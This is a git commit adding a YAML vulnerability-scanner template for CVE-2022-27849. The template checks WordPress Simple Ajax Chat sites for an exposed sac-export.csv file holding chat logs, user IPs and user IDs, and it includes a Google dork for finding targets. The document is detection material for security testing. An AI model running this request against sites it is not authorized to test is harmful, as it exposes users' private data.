Create CVE-2022-27849.yaml

2022-04-22 13:11:27 +04:00 · 2022-04-22 13:11:27 +04:00 · 6942229274
parent 31ef587c9e
commit 6942229274
1 changed files with 42 additions and 0 deletions
--- a/cves/2022/CVE-2022-27849.yaml
+++ b/cves/2022/CVE-2022-27849.yaml
@ -0,0 +1,42 @@
+id: CVE-2022-27849
+info:
+  name: WordPress Simple Ajax Chat plugin <= 20220115 - Sensitive Information Disclosure vulnerability
+  author: random-robbie
+  severity: medium
+  description: |
+        Simple Ajax Chat < 20220216 - Sensitive Information Disclosure. The plugin does not properly restrict access to the exported data via the sac-export.csv file, which could allow unauthenticated users to access it
+  reference:
+    - https://wordpress.org/plugins/simple-ajax-chat/#developers
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-27849/
+  classification:
+    cvss-metrics: 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'
+    cvss-score: 5.3
+    cve-id: CVE-2022-27849
+    cwe-id: CWE-200
+  metadata:
+    google-dork: inurl:/wp-content/plugins/simple-ajax-chat/
+  tags: wp,wordpress,wp-plugin,cve,cve2022,disclosure
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/simple-ajax-chat/sac-export.csv'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '"Chat Log"'
+          - '"User IP"'
+          - '"User ID"'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/csv
+
+      - type: status
+        status:
+          - 200